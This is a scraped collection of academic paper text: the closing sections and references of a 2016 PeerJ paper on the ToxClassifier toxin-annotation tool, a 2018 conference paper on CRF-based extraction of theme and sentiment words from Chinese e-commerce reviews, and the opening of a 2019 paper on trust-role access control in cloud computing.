15 Potential toxin VEGF—Toxin more appropriate measurements of performance than simple accuracy. Another issue of toxin classification lies in unbalanced datasets, because most venomous animal genomes encode less than 100 toxins and 20,000–30,000 physiological non-toxic proteins; as a result, even a high performing method can generate a high number of false positive predictions. For example, 99.5% correct prediction of non-toxins results in ∼100 false positive toxins for an average animal proteome, which is in fact more than the actual number of true toxins. In order to minimize both of these problems, the ToxClassifier training scheme was conservative, using only well-annotated toxins from UniProtKB/ToxProt database as positives, and while this might lead to a somewhat lower positive prediction rate (due to missing likely toxins which are not annotated as such), it does serve to minimise the false positive rate. Notably, predictions were less accurate on some genome datasets, especially Conus snail proteins, with low performance metrics observed for all tested annotation methods. This discrepancy was likely caused by the assumption that sequences deposited in the UniProtKB/SwissProt-ToxProt sequence are bona fide toxins, while sequences in the UniProtKB/SwissProt and TrEMBL databases without ‘toxin’ or ‘venom’ keywords are not toxins. Given that toxin activity is attributed to most sequences without biological validation, it is likely that the training datasets almost certainly excluded a number of toxin sequences and included some yet unknown toxins as non-toxic. Another limitation of the ‘ToxClassifier’ lies in the inherent bias of the training sets; an underrepresentation in sequences from certain animal lineages, particularly the basal Metazoa, e.g., Cnidaria, could lead to incorrect assignment and suspicious quality of existing annotation of conotoxins is a reason to treat prediction on this protein class with caution. To elevate these problems, ‘ToxClassifier’ has been designed to also report sequences suspected to Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 15/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90 have closest homology to underrepresented taxa as ‘suspicious toxin’ and recommends manual annotation with other tools, such as InterProScan (Zdobnov & Apweiler, 2001). Use of machine learning for toxin prediction has been attempted before and a range of such tools exists; however, most of the available tools are heavily specialised for toxins of specific animal origins. For example, SpiderP (Wong et al., 2013) (http: //www.arachnoserver.org/spiderP.html) is a predictor for spider toxins while ToxinPred (Gupta et al., 2013) (http://crdd.osdd.net/raghava/toxinpred/) predicts only small peptide toxins; while ClanTox (Kaplan, Morpurgo & Linial, 2007) (http://www.clantox.cs.huji.ac. il/tech.php) was trained only on an ion-channel toxin dataset and PredCSF (Fan et al., 2016) (http://www.csbio.sjtu.edu.cn/bioinf/PredCSF/) is conotoxin specific. In addition, the reported training set sizes are low (for example ClanTox was trained on ∼600 ion channel toxins; the ToxinPred toxin positive training set is 1,805 sequences, while as of 11th May 2016, the UniProtKB/SwissProt-ToxProt database contained∼6,500 sequences). None of the currently available machine learning methods also gives a comparison with other currently used accepted bioinformatics annotation methods. When compared to ToxClassifier and conventional annotation tools (Tables 2 and 3), ClanTox and ToxinPred tools were found to perform similar to BLAST based methods, while ToxClassifier demonstrated higher performance across all metrics, which is likely a result of comparatively larger training sets and combination of different internal classifiers. In addition to high performance, the user interface of the ‘ToxClassifier’ web service reports the best-scoring hit annotation either to UniProtKB/SwissProt-ToxProt (allowing placement of the toxin into the most appropriate toxin protein family), or to the best hit in UniProtKB/SwissProt (giving the closest homology to a non-toxin protein). In summary, this study has established baseline prediction accuracies for a selection of toxin annotation methods and integrates these methods into an easy-to-use, high-precision, machine learning-based classification system named ‘ToxClassifier.’ This tool offers a reliable and reproducible framework for toxin annotation to enable standardised toxin prediction in venomics projects and to allow for semi-automatic annotation or re-annotation of existing datasets. ACKNOWLEDGEMENTS The authors are grateful to Prof. Dr. Ana M. Moura-da-Silva who provided the unpublished anonymised snake venom transcriptome sequences. We also thank Prof. J Malcolm Shick and Prof. Dr. John Cullum for critically reviewing the manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the United Kingdom Medical Research Council (MRC grant G82144A). PFL is also supported as a Visiting International Research Professor by the Universidade de São Paulo (USP grant 13.1.1502.9.8). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 16/20 https://peerj.com http://www.arachnoserver.org/spiderP.html http://www.arachnoserver.org/spiderP.html http://crdd.osdd.net/raghava/toxinpred/ http://www.clantox.cs.huji.ac.il/tech.php http://www.clantox.cs.huji.ac.il/tech.php http://www.csbio.sjtu.edu.cn/bioinf/PredCSF/ http://dx.doi.org/10.7717/peerj-cs.90 Grant Disclosures The following grant information was disclosed by the authors: United Kingdom Medical Research Council: G82144A. Universidade de São Paulo: 13.1.1502.9.8. Competing Interests The authors declare there are no competing interests. Author Contributions • Ranko Gacesa performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • David J. Barlow analyzed the data, reviewed drafts of the paper. • Paul F. Long conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables. Data Availability The following information was supplied regarding data availability: The raw data has been supplied as a Supplementary File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.90#supplemental-information. REFERENCES Altschul SF, Madden TL, Schäffer AA, Zhang J, Zhang Z, Miller W, Lipman DJ. 1997. Gapped BLAST and PSI-BLAST: a new generation of protein database search programs. Nucleic Acids Research 25:3389–3402 DOI 10.1093/nar/25.17.3389. Bairoch A, Apweiler R. 2000. The SWISS-PROT protein sequence database and its sup- plement TrEMBLin 2000. Nucleic Acids Research 28:45–48 DOI 10.1093/nar/28.1.45. Bateman A, Martin MJ, O’donovan C, Magrane M, Apweiler R, Alpi E, Antunes R, Arganiska J, Bely B, Bingley M, Bonilla C, Britto R, Bursteinas B, Chavali G, Cibrian-Uhalte E, Da Silva A, De Giorgi M, Dogan T, Fazzini F, Gane P, Castro LG, Garmiri P, Hatton-Ellis E, Hieta R, Huntley R, Legge D, Liu W, Luo J, Macdougall A, Mutowo P, Nightingale A, Orchard S, Pichler K, Poggioli D, Pundir S, Pureza L, Qi G, Rosanoff S, Saidi R, Sawford T, Shypitsyna A, Turner E, Volynkin V, Wardell T, Watkins X, Zellner H, Cowley A, Figueira L, Li W, McWilliam H, Lopez R, Xenarios I, Bougueleret L, Bridge A, Poux S, Redaschi N, Aimo L, Argoud-Puy G, Auchincloss A, Axelsen K, Bansal P, Baratin D, Blatter MC, Boeckmann B, Bolleman J, Boutet E, Breuza L, Casal-Casas C, De Castro E, Coudert E, Cuche B, Doche M, Dornevil D, Duvaud S, Estreicher A, Famiglietti L, Feuermann M, Gasteiger E, Gehant S, Gerritsen V, Gos A, Gruaz-Gumowski N, Hinz U, Hulo C, Jungo F, Keller G, Lara V, Lemercier P, Lieberherr D, Lombardot T, Martin X, Masson P, Morgat A, Neto T, Nouspikel N, Paesano S, Pedruzzi I, Pilbout S, Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 17/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90/supplemental-information http://dx.doi.org/10.7717/peerj-cs.90#supplemental-information http://dx.doi.org/10.7717/peerj-cs.90#supplemental-information http://dx.doi.org/10.1093/nar/25.17.3389 http://dx.doi.org/10.1093/nar/28.1.45 http://dx.doi.org/10.7717/peerj-cs.90 Pozzato M, Pruess M, Rivoire C, Roechert B, Schneider M, Sigrist C, Sonesson K, Staehli S, Stutz A, Sundaram S, Tognolli M, Verbregue L, Veuthey AL, Wu CH, Arighi CN, Arminski L, Chen C, Chen Y, Garavelli JS, Huang H, Laiho K, McGarvey P, Natale DA, Suzek BE, Vinayaka CR, Wang Q, Wang Y, Yeh LS, Yerramalla MS, Zhang J. 2015. UniProt: a hub for protein information. Nucleic Acids Research 43:D204–D212 DOI 10.1093/nar/gku989. Bromberg Y, Yachdav G, Ofran Y, Schneider R, Rost B. 2009. New in protein structure and function annotation: hotspots, single nucleotide polymorphisms and the ‘‘Deep Web’’. Current Opinion in Drug Discovery & Development 12:408–419. Camacho C, Coulouris G, Avagyan V, Ma N, Papadopoulos J, Bealer K, Madden TL. 2009. BLAST+: architecture and applications. BMC Bioinformatics 10:1–9 DOI 10.1186/1471-2105-10-421. Chang D, Duda TF. 2012. Extensive and continuous duplication facilitates rapid evolution and diversification of gene families. Molecular Biology and Evolution 29:2019–2029 DOI 10.1093/molbev/mss068. Eddy SR. 2011. Accelerated profile HMM searches. PLoS Computational Biology 7:e1002195 DOI 10.1371/journal.pcbi.1002195. Fan YX, Song J, Kong X, Shen HB. 2016. PredCSF: an integrated feature-based approach for predicting conotoxin superfamily. Protein & Peptide Letters 18:261–267 DOI 10.2174/092986611794578341. Fry B. 2005. From genome to ‘‘venome’’: molecular origin and evolution of the snake venom proteome inferred from phylogenetic analysis of toxin sequences and related body proteins. Genome Research 15:403–420 DOI 10.1101/gr.3228405. Gacesa R, Chung R, Dunn SR, Weston AJ, Jaimes-Becerra A, Marques AC, Morandini AC, Hranueli D, Starcevic A, Ward M, Long PF. 2015. Gene duplications are extensive and contribute significantly to the toxic proteome of nematocysts isolated from Acropora digitifera (Cnidaria: Anthozoa: Scleractinia). BMC Genomics 16:774 DOI 10.1186/s12864-015-1976-4. Gupta S, Kapoor P, Chaudhary K, Gautam A, Kumar R, Raghava GPS. 2013. In silico approach for predicting toxicity of peptides and proteins. PLoS ONE 8:e73957 DOI 10.1371/journal.pone.0073957. Hargreaves AD, Swain MT, Hegarty MJ, Logan DW, Mulley JF. 2014. Restriction and recruitment—gene duplication and the origin and evolution of snake venom toxins. Genome Biology and Evolution 6:2088–2095 DOI 10.1093/gbe/evu166. Jungo F, Bougueleret L, Xenarios I, Poux S. 2012. The UniProtKB/Swiss-Prot Tox- Prot program: a central hub of integrated venom protein data. Toxicon 60:551–557 DOI 10.1016/j.toxicon.2012.03.010. Junqueira-de-Azevedo ILM, Bastos CMV, Ho PL, Luna MS, Yamanouye N, Casewell NR. 2015. Venom-related transcripts from Bothrops jararaca tissues provide novel molecular insights into the production and evolution of snake venom. Molecular Biology and Evolution 32:754–766 DOI 10.1093/molbev/msu337. Kaas Q, Craik DJ. 2015. Bioinformatics-aided venomics. Toxins 7:2159–2187 DOI 10.3390/toxins7062159. Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 18/20 https://peerj.com http://dx.doi.org/10.1093/nar/gku989 http://dx.doi.org/10.1186/1471-2105-10-421 http://dx.doi.org/10.1093/molbev/mss068 http://dx.doi.org/10.1371/journal.pcbi.1002195 http://dx.doi.org/10.2174/092986611794578341 http://dx.doi.org/10.1101/gr.3228405 http://dx.doi.org/10.1186/s12864-015-1976-4 http://dx.doi.org/10.1371/journal.pone.0073957 http://dx.doi.org/10.1093/gbe/evu166 http://dx.doi.org/10.1016/j.toxicon.2012.03.010 http://dx.doi.org/10.1093/molbev/msu337 http://dx.doi.org/10.3390/toxins7062159 http://dx.doi.org/10.7717/peerj-cs.90 Kaplan N, Morpurgo N, Linial M. 2007. Novel families of toxin-like peptides in insects and mammals: a computational approach. Journal of Molecular Biology 369:553–566 DOI 10.1016/j.jmb.2007.02.106. Krogh A, Brown M, Mian IS, Sjölander K, Haussler D. 1994. Hidden markov models in computational biology, applications to protein modeling. Journal of Molecular Biology 235:1501–1531 DOI 10.1006/jmbi.1994.1104. Li R, Yu H, Xing R, Liu S, Qing Y, Li K, Li B, Meng X, Cui J, Li P. 2012. Application of nanoLC-MS/MSto the shotgun proteomic analysis of the nematocyst proteins from jellyfish Stomolophus meleagris. Journal of Chromatography B: Analytical Technologies in the Biomedical and Life Sciences 899:86–95 DOI 10.1016/j.jchromb.2012.05.006. Li R, Yu H, Xue W, Yue Y, Liu S, Xing R, Li P. 2014. Jellyfish venomics and venom gland transcriptomics analysis of Stomolophus meleagris to reveal the toxins associated with sting. Journal of Proteomics 106:17–29 DOI 10.1016/j.jprot.2014.04.011. Liu G, Zhou Y, Liu D, Wang Q, Ruan Z, He Q, Zhang L. 2015. Global transcriptome analysis of the tentacle of the Jellyfish Cyanea capillata using deep sequencing and expressed sequence tags: insight into the toxin-and degenerative disease-related transcripts. PLoS ONE 10:1–22 DOI 10.1371/journal.pone.0142680. Matthews BW. 1975. Comparison of the predicted and observed secondary structure of T4 phage lysozyme. BBA—Protein Structure 405:442–451 DOI 10.1016/0005-2795(75)90109-9. Neumann RS, Kumar S, Shalchian-Tabrizi K. 2014. BLAST output visualization in the new sequencing era. Briefings in Bioinformatics 15:484–503 DOI 10.1093/bib/bbt009. Powers D. 2011. Evaluation: from precision, recall and f-measure to roc., informedness, markedness & correlation. Journal of Machine Learning Technologies 2:37–63. Rachamim T, Morgenstern D, Aharonovich D, Brekhman V, Lotan T, Sher D. 2014. The dynamically evolving nematocyst content of an anthozoan, a scyphozoan, and a hydrozoan. Molecular Biology and Evolution 32:740–753 DOI 10.1093/molbev/msu335. Reyes-Velasco J, Card DC, Andrew AL, Shaney KJ, Adams RH, Schield DR, Casewell NR, Mackessy SP, Castoe TA. 2015. Expression of venom gene homologs in diverse python tissues suggests a new model for the evolution of snake venom. Molecular Biology and Evolution 32:173–183 DOI 10.1093/molbev/msu294. Schwartz EF, Diego-Garcia E, Rodríguez de la Vega RC, Possani LD, Whittington CM, Papenfuss AT, Locke DP, Mardis ER, Wilson RK, Abubucker S, Mitreva M, Wong ESW, Hsu AL, Kuchel PW, Belov K, Warren WC, Sher D, Zlotkin E, Knebel A, Bsor T, Nesher N, Tal T, Morgenstern D, Cohen E, Fishman Y, Zlotkin E, Schwartz EF, Diego-Garcia E, Rodríguez de la Vega RC, Possani LD, Liu G, Zhou Y, Liu D, Wang Q, Ruan Z, He Q, Zhang L. 2015. Transcriptome analysis of the venom gland of the Mexican scorpion Hadrurus gertschi (Arachnida: Scorpiones). Toxicon 11:865–879 DOI 10.1371/journal.pone.0142680. Sher D, Zlotkin E. 2009. A hydra with many heads: protein and polypeptide toxins from hydra and their biological roles. Toxicon 54:1148–1161 DOI 10.1016/j.toxicon.2009.02.036. Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 19/20 https://peerj.com http://dx.doi.org/10.1016/j.jmb.2007.02.106 http://dx.doi.org/10.1006/jmbi.1994.1104 http://dx.doi.org/10.1016/j.jchromb.2012.05.006 http://dx.doi.org/10.1016/j.jprot.2014.04.011 http://dx.doi.org/10.1371/journal.pone.0142680 http://dx.doi.org/10.1016/0005-2795(75)90109-9 http://dx.doi.org/10.1093/bib/bbt009 http://dx.doi.org/10.1093/molbev/msu335 http://dx.doi.org/10.1093/molbev/msu294 http://dx.doi.org/10.1371/journal.pone.0142680 http://dx.doi.org/10.1016/j.toxicon.2009.02.036 http://dx.doi.org/10.7717/peerj-cs.90 Starcevic A, Long PF. 2013. Diversification of animal venom peptides-were jellyfish amongst the first combinatorial chemists? ChemBioChem 14:1407–1409 DOI 10.1002/cbic.201300305. Starcevic A, Moura-Da-Silva AM, Cullum J, Hranueli D, Long PF. 2015. Combinations of long peptide sequence blocks can be used to describe toxin diversification in venomous animals. Toxicon 95:84–92 DOI 10.1016/j.toxicon.2015.01.005. Vonk FJ, Casewell NR, Henkel CV, Heimberg AM, Jansen HJ, McCleary RJR, Kerkkamp HME. 2013. The king cobra genome reveals dynamic gene evolution and adaptation in the snake venom system. Proceedings of the National Academy of Sciences of the United States of America 110:20651–20656 DOI 10.1073/pnas.1314702110. Weston AJ, Chung R, Dunlap WC, Morandini AC, Marques AC, Moura-da-Silva AM, Ward M, Padilla G, Da Silva LF, Andreakis N, Long PF. 2013. Proteomic characterisation of toxins isolated from nematocysts of the South Atlantic jellyfish Olindias sambaquiensis. Toxicon 71:11–17 DOI 10.1016/j.toxicon.2013.05.002. Weston AJ, Dunlap WC, Shick JM, Klueter A, Iglic K, Vukelic A, Starcevic A, Ward M, Wells ML, Trick CG, Long PF. 2012. A profile of an endosymbiont-enriched fraction of the coral Stylophora pistillata reveals proteins relevant to microbial- host Interactions. Molecular & Cellular Proteomics 11:M111.015487–M111.015487 DOI 10.1074/mcp.M111.015487. Wheeler DL, Church DM, Federhen S, Lash AE, Madden TL, Pontius JU, Schuler GD, Schrimi LM, Sequerira E, Tatusova TA, Wagner L. 2003. Database resources of the National Center for Biotechnology. Nucleic Acids Research 31:28–33 DOI 10.1093/nar/gkg033. Whittington CM, Papenfuss AT, Locke DP, Mardis ER, Wilson RK, Abubucker S, Mitreva M, Wong ESW, Hsu AL, Kuchel PW, Belov K, Warren WC. 2010. Novel venom gene discovery in the platypus. Genome Biology 11:R95 DOI 10.1186/gb-2010-11-9-r95. Wong ESW, Hardy MC, Wood D, Bailey T, King GF. 2013. SVM-based prediction of propeptide cleavage sites in spider toxins identifies toxin innovation in an Australian tarantula. PLoS ONE 8:e66279 DOI 10.1371/journal.pone.0066279. Zdobnov EM, Apweiler R. 2001. InterProScan-an integration platform for the signature- recognition methods in InterPro. Bioinformatics (Oxford, England) 17:847–848 DOI 10.1093/bioinformatics/17.9.847. Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 20/20 https://peerj.com http://dx.doi.org/10.1002/cbic.201300305 http://dx.doi.org/10.1016/j.toxicon.2015.01.005 http://dx.doi.org/10.1073/pnas.1314702110 http://dx.doi.org/10.1016/j.toxicon.2013.05.002 http://dx.doi.org/10.1074/mcp.M111.015487 http://dx.doi.org/10.1093/nar/gkg033 http://dx.doi.org/10.1186/gb-2010-11-9-r95 http://dx.doi.org/10.1371/journal.pone.0066279 http://dx.doi.org/10.1093/bioinformatics/17.9.847 http://dx.doi.org/10.7717/peerj-cs.90 work_qfsbk44dp5hapniij77q7pd4wi ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 92 The Extraction of Comment Information and Sentiment Analysis in Chinese Reviews Li Danyang School of Computer Science and Engineering Xi’an Technological University Xi’an, China e-mail: 821563942@qq.com Fan Huimin School of Computer Science and Engineering Xi’an Technological University Xi’an, China e-mail: 492896361@ qq.com Zhao Yingze School of Marxism Xi'an Jiaotong University Xi’an, China e-mail: yingze1013@163.com Abstract—Sentiment analysis, also known as opinion mining, refers to the emotional tendencies expressed by the critics through the analysis of the content of the text. The task of text sentiment analysis mainly includes the classification of sentiment, the extraction of sentiment information and the retrieval and induction of sentiment information. Based on CRF, this paper will extract several pairs of theme words and sentiment words exist in the e-commerce review, and judge the sentiment inclination of the extracted sentiment words. The experimental results show that CRF has a good effect on the extraction of emotional information. Keywords-CRF; Extract Theme Words; Extract Sentiment Words; Sentiment Analysis I. INTRODUCTION With the rapid development of web 2.0 technology, there have been network reviews on the platform with exponential growth, such as micro-blog reviews, news commentaries and e-commerce reviews, etc. E-commerce is a business activity based on information network technology and centered on commodity exchange. With the diversification of consumer information in twenty-first Century, the trading volume of e- commerce has increased rapidly. It has become an important part of the national economy and plays an extremely important role. For the e-commerce platform, the comment information greatly affects the consumer's purchase decision[1]. By extracting the comment information in the Chinese comment text, it can not only guide consumers to make rational consumption, but also help the merchants to improve the quality of the products. The comment information includes the theme words and sentiment words that appear in the commentary, the theme word refers to the evaluation object in the comment, which is the modification object of the sentiment word in the sentence, which is usually expressed as some attribute of the product. The extraction of comment information is one of the key tasks of text sentiment analysis, the existing methods for extracting information from reviews are mainly divided into rules/template and statistical methods. II. EXTRACTION METHOD OF EVALUATION INFORMATION The rule/template method is mainly based on the characteristics of the text itself, making the corresponding rules or templates to identify the specific field of evaluation objects. Liu Bing first proposed the problem of evaluation object extraction, he used the noun with high frequency as the evaluation object, and used the nearest adjective from the evaluation object as an sentiment word[2]. According to the characteristics of Chinese language, Qiu Yunfei and Chen Yifang put forward the method of extracting commodity evaluation objects by using word characteristics and syntactic analysis[3]. However, the rule/template method requires domain experts to define the evaluation objects and rules in the corresponding field, so it cannot satisfy the emerging neologisms, and has no cross domain and portability, therefore, the most effective extraction method is based on the statistical method. The statistical extraction method uses a trained statistical model to extract comment information. Niklas Jako et al. proposed the use of conditional random field model to extract the evaluation object, and model the extraction problem of the evaluation object into a sequence marking task[4]. Jin Lijun and others have studied the method of automatic recognition based on SVM[5]. This paper mainly studies the application of CRF statistical model in the extraction of comment information. III. COMMENT INFORMATION EXTRACTION BASED ON CRF STATISTICAL MODEL A. Review information extraction process based on CRF Based on the statistical method, this paper uses the CRF model as the main model and combines the constructed emotional dictionary to extract the comment information, as 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 93 shown in Figure 1, it mainly includes building emotional lexicon, data preprocessing, part of speech tagging, training CRF model, using CRF model to extract theme words and sentiment words, judging the sentiment inclination of the extracted sentiment words and exporting final results. Figure 1. Review Information Extraction Process Based on CRF B. Data pretreatment Data pretreatment is an essential part of text data mining. In this paper, it mainly includes the following parts: 1) Building a sentiment word dictionary: This paper will extend the sentiment dictionary for the use of the corpus. Firstly, the new dictionary is applied to Chinese word segmentation, which makes segmentation more accurate and largely avoids the destruction of the theme words and emotional words when they are segmenting. Secondly, the new emotional dictionary is applied to the sentiment tendencies of sentiment words. 2) Chinese word segmentation: Chinese word segmentation is the basis of text mining, but Chinese is not as natural as English word, so Chinese word segmentation is much more complicated than English word segmentation. In this paper, the more mature Jieba segmentation algorithm combined with the new sentiment dictionary can be used to carry out Chinese word segmentation, which is achieve a good segmentation effect. 3) Removing the stop words: The stop words are words that are completely useless or meaningless, such as auxiliary words, mood words, punctuation marks and so on. The removal of stop words can improve the efficiency of retrieval, save storage space, and exclude interference words. 4) Sequence labeling: In order to extract more accurate theme words and sentiment words, this paper divides the elements in the text into 3 categories by using sequence labeling: the theme words is marked as T (Theme), the sentiment word is marked as S (Sentiment), and the rest of the words are labeled as O (Other). The results of some of the data after the above pretreatment are shown in Figure 2. Figure 2. An example of data pretreatment results C. Part of Speech Tagging CRF model is actually transforming information extraction problem into sequence labeling problem. Therefore, in order to train CRF model, we need to process part of speech tagging of corpus in addition to three kinds of customized tags. Part of speech is used to describe the function of a word in context. Part of speech tagging is also called part-of-speech tagging, which refers to the process of marking a correct part of speech for every word in the word segmentation result. Different languages have different set of part of speech tagging. In this paper, the annotation set of parsing tree is used. Part of the data after the tagging is shown in Table 2. Figure 3. An example of part of speech tagging D. The Introduction of CRF Conditional Random Fields[6], CRF or CRFs for short, was first proposed by John Lafferty in 2001. It combines the characteristics of maximum entropy model and hidden Markov model, and it is a probabilistic undirected graph model. It is often used in sequence segmentation and tagging, 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 94 and the conditional probability of the output node can be calculated under the given input node. CRF model can better capture the context information[7], accurately identify the key information, has been widely applied to many fields of natural language processing, and has a good performance in Chinese natural language processing tasks, such as the part of speech tagging, machine translation, prosodic structure prediction and speech recognition. CRF is an undirected graph model, and Lefferty and others define CRF as: order G=(V,E), where G represents an undirected graph, and V and E belong to a set in an undirected graph. In this expression, V represents the set of nodes, and E represents the set of edges. In the tag sequence, the elements and the nodes in the graph correspond to one by one. Under the condition of known observation sequence X, if the distribution of the random variable satisfies Markov property, that is, the node is adjacent to the node in graph G, then it is called a conditional random field. The formalized description of CRF is as follows: Set G= (V, E) is an undirected graph, the V represents the set of vertices, and the E represents the set of the edges. Y={Yv|v∈V} represents the index of vertices in figure G, that is, each vertex corresponds to the composition Yv of the marked sequence represented by a random variable. Therefore, on the condition of X, the form of joint distribution related to G is p(y1,y2,…,yn|X), in which y is a marker sequence and X represents the observation sequence. If the random variable r satisfies the Markov property about G, that is ( | , , ) ( | , , ~ ) v u v u p Y X Y u v p Y X Y u v  (1) In the above formula, u~v indicates that u is adjacent to v in graph G, and (X, Y) constitutes a conditional random field. In theory, if graph G represents the conditional dependence between the labeled sequences to be modeled, then its structure can be arbitrary. But when modeling the sequence annotation task, the most simple and general graph structure is: a simple first order chain corresponding to the elements of Y is formed. This CRF is generally called linear - chain CRF, the model of linear - chain CRF is shown in Figure 2, X= (x1, x2,... xn) is the observation sequence, y= (y1, y2,..., yn) is the output sequence. Figure 4. Structural Representation of Linear - chain CRF Given the observation sequence, the sequence conditional probability of the output is as follows: 1 1 | exp ( , , , ) ( , , ) ( ) k k i i k k i i k i k P y x t y y x i s y x i Z x           （）= (2) tk(yi-1,yi,x,i) is a state transfer function; sk(yi,x,i) is a state feature function; tk, sk are all characteristic functions; λk, μk is the weight of the characteristic function, which is learned by training; Z(x) is a normalization factor: 1 ( ) ( , , , ) ( , , ) k k i i k k i y i k i k Z x t y y x i s y x i             (3) As one of the most important undirected graph structures, linear - chain CRF has been applied to the practical research, and most of the Natural Language Processing research tasks all use linear - chain CRF. IV. EXPERIMENTAL RESULTS AND ANALYSIS In the experiment, the data set of this paper is divided into two parts: training set and test set based on the data set provided by the Big Data & Computing Intelligence Contest in 2017. The CRF model was trained with the training set, and then the theme words and Sentiment words were extracted from the test set, and judge the sentiment inclination of the extracted sentiment words. In this paper, F1 is used as the index of evaluation model. A. Experimental evaluation index There are three main evaluation indexes commonly used in data mining and natural language processing, including accuracy, recall rate and F1. Among them, the accuracy rate for the prediction results is to indicate how many positive samples are true in the predicted sample. The recall rate is aimed at our original sample, which indicates that the number of examples in the sample is predicted correctly. And F1 is the harmonic average of the accuracy and recall. In a word, this paper uses the F1 value as an evaluation standard. In this paper, the calculation formula is as follows: Extracting the correct theme words umber of sentiment words Extracting theme words / umber of sentiment words P  /N N (4) Extracting the correct theme words umber of sentiment words Theme words in data set / Total number of sentiment words P  /N (5) 2 * * ( ) P R F P R   (6) B. Training CRF model The CRF model is trained after the data set is preprocessed by word segmentation, annotation and so on. This paper uses the open source tool CRF++ to train the training model, the feature template needs to be prepared 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 95 before the training model, and the feature template file of this article is shown in Figure 3. Figure 5. The Feature Template The T in "T**:%x[#,#]" represents the template type, where there are two templates altogether. The first is Unigram template, the first character is U, which is a template for describing unigram feature; The second is Bigram template, the first character is B. Two "#" respectively represent relative row offsets and column offsets, each line of "%x[#, #]" generates a CRF point (state) function: f(s,o), where "s " is the t time label (output), "o" is t times the context. The trained CRF model contains feature template and feature dimension, data set number, characteristic function and the weight of information, a series of information is output in the training process, and some of the information is shown in Figure 4. The meaning of the parameter information is as follows: Iter: The number of iterations. When the number of iterations reaches the max, the iteration is terminated. Terr: Mark error rate. Serr: Sentence error rate. Obj: The value of the current object. When the value converges to a definite value, the training is completed. Diff: The relative difference between the value of the last object. When this value is lower than eta, the training is completed. Figure 6. Output File C. Experimental Results and Analysis After extracting the theme words and sentiment words, the next step is the judgment of the sentiment inclination of the extracted sentiment words, and this step is much simpler. If the sentiment word belongs to the positive affective dictionary, the sentiment is positive. If it belongs to the negative sentiment dictionary, the sentiment is negative, otherwise it is neutral. The experimental results before and after the optimization dictionary are compared as shown in the table below. Table 3 is the experimental result of no emotional dictionary. Table 4 is the experimental result after optimization. Figure 7. Examples of no optimized results Figure 8. Examples of optimized results 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 96 In the above table, there are no definite theme words in some comments, but there are corresponding sentiment words. In this case, the theme word is marked as NULL. After comparison, it is found that after optimization, the recognition of the theme words is more accurate than before, and the accuracy rate is further improved. The next table 5 is the comparison of the F1 values before and after the optimization. The comparison results from the table show that the F1 value of the optimized dictionary is about 3% higher than that before the optimization. TABLE I. COMPARISON OF F1 BEFORE AND AFTER OPTIMIZATION Data Set F1 20,000 comments 0.58498 20,000 comments 0.61827 V. CONCLUSION The accurate recognition of the theme words and sentiment words in the commentary is the key to the extraction of comment information and the basis for further analysis of the text[8]. The extraction of comment information in Chinese review is of great significance to both the merchant and the consumer. The merchant can adjust the goods according to the comment information or improve the quality of the product. The consumer can also make auxiliary decisions according to the comment information. In this paper, the CRF statistical model is used to extract the theme words and sentiment words in the comment statement, and it is proved that the CRF model is effective in identifying subject words and emotional words. In addition, this paper optimizes the emotional dictionary, which combines data sets and CNKI's emotional lexicon to build an new emotional dictionary that is more suitable for this paper. The experimental results show that the optimization dictionary makes the recognition of the theme words and sentiment words more accurate, and the F1 value is further improved. Of course, in addition to the CRF model used in this paper, there are other methods that can also extract comment information, such as LDA theme model, dependency parsing method and so on. Besides, there are still some shortcomings in this paper. Chinese expression is much richer than English, In Chinese, there are some irony and even the use of network language statements can not accurately identify theme words and sentiment words, so we need further study of Chinese semantics and so on. REFERENCES [1] Li Piji, Ma Jun, Zhang Dongmei, etc.. “Label extraction and sorting in user reviews,” J. Journal of Chinese Information Processing, 2012, vol. 26(5), pp. 14-19,45. [2] Hu MQ, Liu B. “Mining and summarizing customer reviews,” C.Proc. of the 10th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. Seattle, WA, USA. 2004, pp.168–177. [3] Qiu Yunfei, Chen Yifang, Wang Wei, etc.. “Product evaluation object extraction based on word character and syntactic analysis,” J. Computer Engineering, 2016, vol. 42 (7), pp. 173-180. [4] Jakob N, Gurevych I. “Extracting opinion targets in a single-and cross-domain setting with conditional random fields,” Proc. of the 2010 Conference on Empirical Methods in Natural Language Processing. Cambridge, Massachusetts. 2010. [5] Jin Lijun. “Research on the automatic recognition of the usefulness of SVM based search commodity reviews,” D. Harbin Institute of Technology, 2013. [6] John D Lafferty, Andrew McCallum, Fernando C N Pereira. “Conditional random fields: Probabilistic models for segmenting and labeling sequence data,” Proceedings of the 18th International Conference on Machine Learning. Williamstown, MA, USA, 2001, pp. 282-289. [7] Wang Rongyang, Ju Jiupeng, Li Shoushan, etc.. “Research on feature extraction feature of evaluation object based on CRFs,” J. Journal of Chinese Information Processing, 2012, vol. 26 (2), pp. 56-61. [8] Xia yuan, Zhang Zheng . “Evaluation of object extraction based on CRF,” J. Computer Systemsand Applications.2017, vol. 26 (11), pp. 254-259. work_qg4vx3n3gjbmbihwvtuna3xnkm ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 75 Research on Trust-Role Access Control Model in Cloud Computing Yuchen Wu School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China e-mail: 1127787176@qq.com Pingping Liu School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China e-mail: 1341369601@qq.com Abstract—In order to ensure the security of data in cloud computing, a trust-role-based hybrid cloud 